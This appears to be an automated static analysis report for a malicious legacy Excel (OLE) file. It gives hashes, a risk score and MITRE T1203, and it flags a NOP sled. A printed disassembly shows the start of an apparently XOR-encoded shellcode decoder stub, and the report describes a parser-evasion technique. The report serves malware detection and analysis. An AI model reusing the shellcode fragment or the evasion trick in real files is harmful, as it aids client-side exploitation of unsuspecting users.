Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 75106724a047a406…

MALICIOUS

Office (OLE) / .XLS

Size: 79.5 KB
First seen: 2026-05-11
MD5: b5a182ee021da3e57f50f515c116baa2
SHA-1: eaa40c440058974203dbed6e3037039e4243bb8a
SHA-256: 75106724a047a406799bea2166464ab299bce703e44e216e2c449fe5267d693d
Risk Score: 64

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The sample is identified as malicious and contains a NOP sled, indicating a potential exploit. While VBA macros could not be extracted due to an unsupported format, the presence of embedded URLs and the overall structure suggest an attempt to execute malicious code. The file's structure and heuristic firings point towards an exploit targeting client execution, likely to download further stages.

Heuristics (4)

  • NOP sled detected (severity: high) SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00013408  90                nop
    00013409  90                nop
    0001340A  90                nop
    0001340B  90                nop
    0001340C  90                nop
    0001340D  90                nop
    0001340E  90                nop
    0001340F  90                nop
    00013410  90                nop
    00013411  90                nop
    00013412  90                nop
    00013413  90                nop
    00013414  90                nop
    00013415  90                nop
    00013416  90                nop
    00013417  90                nop
    00013418  90                nop
    00013419  90                nop
    0001341A  90                nop
    0001341B  90                nop
    0001341C  dbdf              fcmovnu st(0), st(7)
    0001341E  d97424f4          fnstenv [esp - 0xc]
    00013422  58                pop eax
    00013423  2bc9              sub ecx, ecx
    00013425  b133              mov cl, 0x33
    00013427  ba4ca87576        mov edx, 0x7675a84c
    0001342C  83c004            add eax, 4
    0001342F  315013            xor dword ptr [eax + 0x13], edx
    00013432  031cbb            add ebx, dword ptr [ebx + edi*4]
    00013435  97                xchg edi, eax
    00013436  836053de          and dword ptr [eax + 0x53], 0xffffffde
    0001343A  6c                insb byte ptr es:[edi], dx
    0001343B  98                cwde
    0001343C  a4                movsb byte ptr es:[edi], byte ptr [esi]
    0001343D  81e57d959392      and ebp, 0x9293957d
    00013443  f68423d05a25cfb4  test byte ptr [ebx - 0x30daa530], 0xb4
    0001344B  4e                dec esi
    0001344C  bebd106177        mov esi, 0x776110bd
    00013451  0b474c            or eax, dword ptr [edi + 0x4c]
    00013454  88bd47024adf      mov byte ptr [ebp - 0x20b5fdb9], bh
    0001345A  3b589f            cmp ebx, dword ptr [eax - 0x61]
    0001345D  3f                aas
    0001345E  0593d23e42        add eax, 0x423ed293
    00013463  c9                leave
    00013464  1d                .byte 0x1d
    00013465  121b              adc bl, byte ptr [ebx]
    00013467  86                .byte 0x86
  • CFB header with no readable streams (severity: medium) OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
  • Unsupported Office format for VBA extraction (severity: info) OFFICE_FORMAT_UNSUPPORTED
    The Analyzer could not extract VBA macros: the document may be legacy, encrypted or malformed.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted:
    • http://www.microsoft.com
      In document text (OLE body)
    • https://www.verisign.com/rpa
      In document text (OLE body)
    • http://ocsp.verisign.com/ocsp/status0
      In document text (OLE body)
    • https://www.verisign.com/rpa0
      In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0
      In document text (OLE body)